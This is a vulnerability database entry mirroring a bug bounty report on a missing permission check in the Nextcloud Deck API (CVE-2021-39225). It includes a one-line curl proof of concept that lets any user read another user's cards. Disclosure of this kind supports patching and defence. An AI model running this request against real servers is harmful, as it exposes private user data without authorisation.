Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneShakierbellowsH1:1331728
HistorySep 07, 2021 - 11:21 a.m.

Nextcloud: Cards in Deck are readable by any user

2021-09-0711:21:19
shakierbellows
hackerone.com
27
nextcloud
sensitive information
security breach
user access
bug bounty

EPSS

0.001

Percentile

43.0%

JSON

Summary:

Allows any user access to sensitive deck card contents.

Steps To Reproduce:

  1. User creates a new “deck” and “stack”.
  2. Create another user on your Nextcloud instance.
  3. curl -X GET -H “OCS-APIREQUEST: true” “http://localhost/index.php/apps/deck/api/v1.0/boards/1/stacks/1” -u hacker

As an output you get things like for example {title":“To do”,“cards”:[{“title”:“Example Task 3”,"}

Impact

Allows any user access to sensitive deck card contents.

Related

cvelist 1
cve 1
nextcloud 1
prion 1
nvd 1
cnvd 1
osv 1
cvelist
cvelist
CVE-2021-39225 Missing permission check on Deck API
2021-10-25 21:40:11
cve
cve
CVE-2021-39225
2021-10-25 22:15:07
nextcloud
nextcloud
Missing permission check on Deck API
2021-10-25 11:13:01
prion
prion
Design/Logic Flaw
2021-10-25 22:15:00
nvd
nvd
CVE-2021-39225
2021-10-25 22:15:07
cnvd
cnvd
Nextcloud Deck Access Control Error Vulnerability (CNVD-2021-102877)
2021-10-28 00:00:00
osv
osv
CVE-2021-39225
2021-10-25 22:15:07

EPSS

0.001

Percentile

43.0%

JSON
Related for H1:1331728
cvelist1cve1nextcloud1prion1nvd1cnvd1osv1